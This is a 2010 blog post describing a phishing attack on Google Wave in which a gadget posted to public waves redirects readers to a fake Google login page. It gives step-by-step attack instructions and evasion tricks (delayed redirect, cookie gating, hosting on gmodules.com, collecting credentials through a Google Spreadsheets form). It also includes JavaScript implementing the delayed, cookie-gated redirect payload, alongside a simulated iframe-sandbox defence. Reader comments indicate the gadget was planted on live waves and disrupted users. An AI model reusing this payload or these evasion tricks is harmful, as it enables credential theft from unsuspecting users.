Tuesday, February 9, 2010

Phishing with Google Wave

Phishing is usually categorized as social engineering rather than a technical hack: it is inherently about tricking the user into clicking a link or visiting a web page. However, a victim being steered to the phished page while they are still on a genuine site should be a cause for concern. Since the victim did not initiate the move to the phished page, they are caught off guard.

This post is about a possible attack on Google Wave which could at the least disrupt the Wave experience, and at worst steal credentials. This attack is similar to the one on Orkut OpenSocial that I had published earlier. I am sure someone somewhere would have already figured this out, but I chose to post it anyway since I got some time off FlashPlus, my Google Chrome extension.
The hack can be done by anyone anonymously and on public waves.
  1. Create a phished Google login page. You could check out Tackle.
  2. Search for public waves.
  3. Reply to one of the messages and insert a gadget in your reply.
  4. The gadget sets top.location to the phished page.
  5. The victim visits Wave and opens this unread wave.
  6. The gadget kicks in and redirects the user to the phished page.
  7. Since the victim was still inside Wave, browsing, they may not suspect a phished page. They may think they were simply logged out.
The following video shows these steps.

A couple of ways to anonymize the attacker could be
  • Make the gadget set top.location after a window.setTimeout instead of doing it immediately.
  • Do not redirect all users. Redirect them only if a certain cookie is not set; if the cookie is set, they were already phished.
  • Create anonymous Gmail accounts and host the gadget and phished page using the Google Gadget Editor on iGoogle. This puts the phished page on a gmodules.com URL, something that is more believable.
  • Submit credentials from the phished page to a form created using Google Spreadsheets.
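To make the steps above and the two anonymizing tricks (delayed redirect, cookie gate) concrete, here is an added illustration. It is not code from this post, from Tackle, or from Google Wave; it models the gadget payload with injectable window objects so it runs under Node without a browser, and it models the host-side fix that stops it, an iframe sandbox without allow-top-navigation. The URLs, the cookie name gw_seen, the delay and the hypothetical wave.example page are all assumptions for the example.

```javascript
// Added illustration, not code from the post or from Google Wave: a model of the
// gadget payload the post describes (delayed top.location redirect, gated on a
// marker cookie) and of the host-side iframe sandbox that stops it. Everything is
// simulated so it runs under Node without a browser; the URLs, cookie name and
// delay below are assumptions for the example.

const PHISH_URL = "https://example.invalid/accounts/ServiceLogin"; // placeholder, not a real page
const MARKER_COOKIE = "gw_seen";   // assumed name of the "already phished" marker cookie
const REDIRECT_DELAY_MS = 15000;   // assumed delay before the redirect fires

// Parse a document.cookie-style string ("a=1; b=2") into a plain object.
function parseCookies(cookieString) {
  const jar = {};
  for (const part of cookieString.split(";")) {
    const idx = part.indexOf("=");
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    if (name) jar[name] = decodeURIComponent(part.slice(idx + 1).trim());
  }
  return jar;
}

// Only browsers without the marker cookie get redirected, so a second visit by the
// same victim (or by someone investigating) sees a harmless-looking gadget.
function shouldRedirect(cookieString) {
  return !(MARKER_COOKIE in parseCookies(cookieString));
}

// The payload that would run inside the gadget iframe. `win` stands in for the
// gadget's window object and is injected so the logic can run outside a browser.
// Returns a record of what happened instead of navigating for real.
function gadgetPayload(win) {
  if (!shouldRedirect(win.document.cookie)) {
    return { redirected: false, reason: "marker cookie present" };
  }
  // Mark the browser before navigating: once top navigates, this frame is torn down.
  win.document.cookie = `${MARKER_COOKIE}=1; path=/`;
  try {
    win.top.location = PHISH_URL;   // the attack: navigate the whole Wave client away
  } catch (e) {
    return { redirected: false, reason: e.message };
  }
  return { redirected: true, reason: "top.location set" };
}

// Arm the payload on a timer so the gadget looks idle when it is first opened.
function armGadget(win, delayMs = REDIRECT_DELAY_MS) {
  return win.setTimeout(() => gadgetPayload(win), delayMs);
}

// Simulated browser. `sandboxed` models a host that embeds the gadget with
// <iframe sandbox="allow-scripts allow-same-origin allow-forms"> and no
// allow-top-navigation token, in which case a write to top.location throws.
function makeBrowser({ sandboxed, cookie = "" }) {
  const top = { href: "https://wave.example/" };   // hypothetical current page
  Object.defineProperty(top, "location", {
    get: () => top.href,
    set: (url) => {
      if (sandboxed) throw new Error("SecurityError: sandboxed frame may not navigate top");
      top.href = url;
    },
  });
  // document.cookie appends one cookie per assignment, as in a real browser.
  const document = { jar: cookie };
  Object.defineProperty(document, "cookie", {
    get: () => document.jar,
    set: (v) => { const c = v.split(";")[0]; document.jar = document.jar ? `${document.jar}; ${c}` : c; },
  });
  const timers = [];
  return {
    document,
    top,
    setTimeout: (fn, ms) => timers.push({ fn, ms }),
    // Fire every pending timer and return the payload results, in order.
    runTimers: () => timers.splice(0).map((t) => t.fn()),
  };
}

// Demo: an open host is hijacked; a sandboxed host is not.
function demo() {
  const results = {};
  for (const sandboxed of [false, true]) {
    const win = makeBrowser({ sandboxed });
    armGadget(win);
    results[sandboxed ? "sandboxed" : "open"] = { ...win.runTimers()[0], location: win.top.location };
  }
  return results;
}

console.log(demo());
```

Two practical points fall out of this. For the defender, the delayed, cookie-gated payload is exactly why loading a reported gadget once and seeing nothing happen proves little; read the gadget's source rather than trusting a single visit. For the host, the simulated sandbox mirrors what the HTML iframe sandbox attribute does when the allow-top-navigation token is left out: the framed script still runs, but its write to top.location is refused. Chromium-based browsers today additionally refuse top navigation from a cross-origin frame that has had no user activation, which would block this particular timer-driven redirect even without a sandbox.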
I am not sure how harmful this hack can get. I have pinged a friend at Google about this.


DucDigital said...

Very interesting, when will they fix this problem? I don't know if their motto "Don't be evil" is true anymore. ha ha

Mark said...

Great stuff, but please stop adding it to random waves: it's just childish.

imma said...

It's pretty harmful when it happens to a wave you're trying to use & it basically blocks you from accessing it. Please remove the gadget now it has been demonstrated, as it is causing rather a lot of damage (still) & someone (maybe not you) is still adding it places ...

lofi said...
This comment has been removed by a blog administrator.
MaXe said...

This is probably the best proof of concept I've seen so far :-) Very good work!

Don't remove the proof of concept just because someone here says you should.

If they have a problem they should contact Google and file a complaint.

Nice work on Tackle as well!

aman said...

Excellent phishing video, it's so useful for all to understand phishing.
